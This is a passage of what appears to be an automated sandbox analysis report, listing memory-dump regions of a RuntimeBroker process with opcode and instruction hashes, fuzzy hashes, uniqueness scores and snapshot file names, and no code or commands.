                                                                                                                                      • Opcode Fuzzy Hash: 151456ce1e90c512bd5d39b3e2dc2fbdb0ca334be6d9487208328c96e8c0d425
                                                                                                                                      • Instruction Fuzzy Hash: 2BB1CD70A0991D8FDBA8DF58C895BA9B3B1FF58301F5141E9D00DE72A5DA35AA81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 07438d131c40ce0b8e35966c849de48f97597928ba03f1abf701b83bed3e5955
                                                                                                                                      • Instruction ID: 37c069a3fa1ee488b44ebad786234aaf23ace6eef31c5cbd0435e680de8ed883
                                                                                                                                      • Opcode Fuzzy Hash: 07438d131c40ce0b8e35966c849de48f97597928ba03f1abf701b83bed3e5955
                                                                                                                                      • Instruction Fuzzy Hash: A6A1EC70E0961D8FDB94EF98C894AA9B7F2FF98304F5041A9D01EE7295DB34A981CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9974084614e3e1d922f4d762f8b9cfc867b7c041284cf69a4e9f01b776bc0f74
                                                                                                                                      • Instruction ID: fe1f75de5de0adeb619099456e53bec19674f2fa908722a73d00825e6be487fc
                                                                                                                                      • Opcode Fuzzy Hash: 9974084614e3e1d922f4d762f8b9cfc867b7c041284cf69a4e9f01b776bc0f74
                                                                                                                                      • Instruction Fuzzy Hash: 6561C870A1591D8FDB94EF58C8A4BA9B7F1FF58304F5041AAD01EE72A6DA34AD81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1963355fed70c49274b9c912351b435039777214ed53617b27a7e03dec388251
                                                                                                                                      • Instruction ID: 029c0ef5aa8b0cb0cf76ebc694c1d70c3715ddefd7e046ceb085c49469d5ba11
                                                                                                                                      • Opcode Fuzzy Hash: 1963355fed70c49274b9c912351b435039777214ed53617b27a7e03dec388251
                                                                                                                                      • Instruction Fuzzy Hash: 6751F27688E7C54FD3038BB09D616D07FF1AF17214B0A06DBD4848B0A3E66C5A4ADB62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9194da20946d499045ec04593a7ced91de6e0cbb1b4c22d8a063f84b70f88945
                                                                                                                                      • Instruction ID: 336c666c8dbf9cbb80acd6b379a7864d6cb9db791061e9dbff9d11cd3d1b6736
                                                                                                                                      • Opcode Fuzzy Hash: 9194da20946d499045ec04593a7ced91de6e0cbb1b4c22d8a063f84b70f88945
                                                                                                                                      • Instruction Fuzzy Hash: 0751D470A1995D8FEBA0EB18C894BE9B7F1FB58300F4001EAA14DD32A1DE746AC1CF10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 067dff6b4a2d2679911af03b4f4c456783f868c40ffa38580cccb4134bba6df6
                                                                                                                                      • Instruction ID: 6a3bd50e2a5b49e512cb425841cf0b5c231a55609df720833b0b85fa8d126ccb
                                                                                                                                      • Opcode Fuzzy Hash: 067dff6b4a2d2679911af03b4f4c456783f868c40ffa38580cccb4134bba6df6
                                                                                                                                      • Instruction Fuzzy Hash: 1151A034A09A4D9FCF84EFA8D494EED7BF1FF58310B0501A6E409E7261D634E990CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2fbf8bc32b45c6b4fa94c2685403ce8a1d13f1f5862515248320ed4742a78fad
                                                                                                                                      • Instruction ID: 5d7adcea12e9a029492768c91cc93bf095ee73b6475ae8b52d75dcd0e9f5b699
                                                                                                                                      • Opcode Fuzzy Hash: 2fbf8bc32b45c6b4fa94c2685403ce8a1d13f1f5862515248320ed4742a78fad
                                                                                                                                      • Instruction Fuzzy Hash: 6E51E470E0961D8AEB69EBA4C8A57EDB7B1FF58700F1101A9D01DA7292DE346A81CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8a56b1b82d2b887f0f93210f9a1f6441b9b17d7a3cacaf3a2b14baaefda6ecb1
                                                                                                                                      • Instruction ID: f43c5c61b7249fd7b5d7922ebd25e7ef534e13843a3990c13fb634480176d5b0
                                                                                                                                      • Opcode Fuzzy Hash: 8a56b1b82d2b887f0f93210f9a1f6441b9b17d7a3cacaf3a2b14baaefda6ecb1
                                                                                                                                      • Instruction Fuzzy Hash: FB41E670E0561D8FEB69EF94D8A5BEDB7B1FF58300F1001A9D01DA3292DA346A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b59943666f5ecb6836dedc7d025524ebcc1dbe46051d505b90ca2c9b4df31f22
                                                                                                                                      • Instruction ID: 8abfe9ed7d22597d34a04bdd55358a51873962218c995c180c378f12320c59df
                                                                                                                                      • Opcode Fuzzy Hash: b59943666f5ecb6836dedc7d025524ebcc1dbe46051d505b90ca2c9b4df31f22
                                                                                                                                      • Instruction Fuzzy Hash: 03316D31E0A50D8BEB28EB84D8547FDB7B5FB59310F214279D009D7295CE786A85CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1633dd0fe4fb348b5166ff36dcb9e338634752872d6dab4a5f2313f9cc5e5de3
                                                                                                                                      • Instruction ID: 3810b0e8db3b79ce92df1a2088da5ab0ae1a3ab732e18397463cab433670e677
                                                                                                                                      • Opcode Fuzzy Hash: 1633dd0fe4fb348b5166ff36dcb9e338634752872d6dab4a5f2313f9cc5e5de3
                                                                                                                                      • Instruction Fuzzy Hash: 24315E70A0964D8FDB55DF68C495AEDBBB1FF58314F06026AD849E3291CB34E941CBC1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 06d461949c97fad1fbf10a8aa60f815845fcc3fd3358d026586a7c03fec3b6cb
                                                                                                                                      • Instruction ID: 92c4067a44b91ce74db8d23c1a1f6b8d970e238d165701111914427ab0ead26c
                                                                                                                                      • Opcode Fuzzy Hash: 06d461949c97fad1fbf10a8aa60f815845fcc3fd3358d026586a7c03fec3b6cb
                                                                                                                                      • Instruction Fuzzy Hash: 0131AD71A0591C8FDBA8DF14C895AE9B7B1FB58305F1001EE810EE3254CB759A81CF55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1eb0f232a8934e9433fdf277ad4bf52983006b4b5c6b444f0c272008b004beba
                                                                                                                                      • Instruction ID: 6a867997a6377db8e3c47701c023bf53da215c36068c4b3420968e13580899cb
                                                                                                                                      • Opcode Fuzzy Hash: 1eb0f232a8934e9433fdf277ad4bf52983006b4b5c6b444f0c272008b004beba
                                                                                                                                      • Instruction Fuzzy Hash: 8131F871E1D68E8FE7129BA4C8212B97BB0EF45314F0506B7D449971E2CA382605C761
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7aee4d7626d2ec9438b403ecf43df372cdce00f66822ec669b5674d77cbfb1c3
                                                                                                                                      • Instruction ID: 3ea8a6219d07199d66d6e2e63698593831677d02b677f936e9402bf1bc4bd82c
                                                                                                                                      • Opcode Fuzzy Hash: 7aee4d7626d2ec9438b403ecf43df372cdce00f66822ec669b5674d77cbfb1c3
                                                                                                                                      • Instruction Fuzzy Hash: DC318F31A0F25D9FE721DBA4C9642ED77F1FF19300F1105B6E409E61E2DA786A18CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 857900a0068b1c9294a293ac6daec2b15558b67e0bfae72576edbf22bbc56dff
                                                                                                                                      • Instruction ID: 8af113f75ee0d2b68ff2a42d72fa5feba963a29b425792ad7bc2f9d30d24f9a4
                                                                                                                                      • Opcode Fuzzy Hash: 857900a0068b1c9294a293ac6daec2b15558b67e0bfae72576edbf22bbc56dff
                                                                                                                                      • Instruction Fuzzy Hash: 70219F35A1966D8FDF19DF58C8616EDB7B1FB58310F01023AD406D32A1DB78A615CBC1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9008f033d6bec055f32132ad541d0532df7bb956a1ce717fae5c501f1a7488ed
                                                                                                                                      • Instruction ID: ac0bf34d4ec258fef36aa7caf3edd70afe7cf3f604a83f5ee871b3bc15b49525
                                                                                                                                      • Opcode Fuzzy Hash: 9008f033d6bec055f32132ad541d0532df7bb956a1ce717fae5c501f1a7488ed
                                                                                                                                      • Instruction Fuzzy Hash: 8131C270E1562E8FEBB5EB54C858BB8B2F5AF58711F4140F9900DA62A1DE796BC0CF10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f959e4febd96886a2f42398038375933e8d11fac6cb6ed6b9385bee2e91f18f0
                                                                                                                                      • Instruction ID: 85538d68fadcdf8b9ceb3a1f7c59970aaa3a80e204560627f5fbfcd3faa17ccb
                                                                                                                                      • Opcode Fuzzy Hash: f959e4febd96886a2f42398038375933e8d11fac6cb6ed6b9385bee2e91f18f0
                                                                                                                                      • Instruction Fuzzy Hash: 76211830A1891E8FDB94FFA8C8A49ADB7F1FF59301B11457AD009E32A5DB34E940CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 53823228ff5de128e75d80221b094efdf397d56653e9ea5dcff56cfe6cec12a2
                                                                                                                                      • Instruction ID: 945b6a7ed6c00b2f9ae39c3dc2294d21d636f90539d099aa370feedec4afd9d1
                                                                                                                                      • Opcode Fuzzy Hash: 53823228ff5de128e75d80221b094efdf397d56653e9ea5dcff56cfe6cec12a2
                                                                                                                                      • Instruction Fuzzy Hash: 0321C370A0A5098FEB68EB84D464BACB7B1EB5D305F1541AEC01EE32A1CA756A518F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a7e643df03956ce1c72205e3f25864cc59de439dd9c62b2af15d7752ced69a9b
                                                                                                                                      • Instruction ID: 1844a6a19e248d8d9cfdd4397cf18c7acf8c62ce2b58acebbb37425a6d9c87e5
                                                                                                                                      • Opcode Fuzzy Hash: a7e643df03956ce1c72205e3f25864cc59de439dd9c62b2af15d7752ced69a9b
                                                                                                                                      • Instruction Fuzzy Hash: 7E21F970E1A62E8FEBB5DB44C8547B872F8AB08710F5100F9D00DA22A5DE785B85CF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e9a54b99f536f01008cfa7d8498ca542766374185ed14f420868808d6eacf68b
                                                                                                                                      • Instruction ID: d52dda180352ad177acca834c0c42a8d95820405dbf1f505c055ecdc93a892d3
                                                                                                                                      • Opcode Fuzzy Hash: e9a54b99f536f01008cfa7d8498ca542766374185ed14f420868808d6eacf68b
                                                                                                                                      • Instruction Fuzzy Hash: B621B670D1562E8FDBA9DB54C8687E8B2B5EB58711F5140F9D00DA26A1DE746BC4CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c4de90359acda7bf41c37b7390c7aab10abccf3faa0a1a2d4caf6e6227ec8eb
                                                                                                                                      • Instruction ID: 8df2e9e7a8578a4bee98ada852b2babd8a3e22e13438befc3a2cfc19eb2dd022
                                                                                                                                      • Opcode Fuzzy Hash: 0c4de90359acda7bf41c37b7390c7aab10abccf3faa0a1a2d4caf6e6227ec8eb
                                                                                                                                      • Instruction Fuzzy Hash: 53213870A0961E8FEB74EB18C9586E877F1EF59701F0401E9D04DD22A5DA752B81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7742425173180be3432e522296d39068cfa1301f210615c85ea5b273e5ab3536
                                                                                                                                      • Instruction ID: d4860a5c1332a8e7d169f1ae0019919a524043be3ce56d655c1448c470c73519
                                                                                                                                      • Opcode Fuzzy Hash: 7742425173180be3432e522296d39068cfa1301f210615c85ea5b273e5ab3536
                                                                                                                                      • Instruction Fuzzy Hash: 7FF0907091868D8FDB55EF6488596ED7BF0FF58305F4145EBE818C22A2DB389294CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8720770a20f06afcf7422632a1fa7429dd36aec68e033f6dca37e95790f3aaf6
                                                                                                                                      • Instruction ID: 93763f2ef8f1300a3f36c5ff891a4ecb7c3dfa5937d268ff7dd6c8fb61ada25a
                                                                                                                                      • Opcode Fuzzy Hash: 8720770a20f06afcf7422632a1fa7429dd36aec68e033f6dca37e95790f3aaf6
                                                                                                                                      • Instruction Fuzzy Hash: 35F0C27190E68E5FEB66BB6448AA2EC7FB0FF15300F0505F7E458C61E3D92855848702
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ab4fc9a15c6360b47525f2eec01a1adec84d28b71979eb451347305908dcf115
                                                                                                                                      • Instruction ID: aa82cb8fc0af2ffe5a09660fe77bb883253b1f6d6d131f7eabf4e27711dec42c
                                                                                                                                      • Opcode Fuzzy Hash: ab4fc9a15c6360b47525f2eec01a1adec84d28b71979eb451347305908dcf115
                                                                                                                                      • Instruction Fuzzy Hash: 72F06D7050D69E8FDB96DF28C895A993BA0FF69300F0501AAE41CC71A2D774E964CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

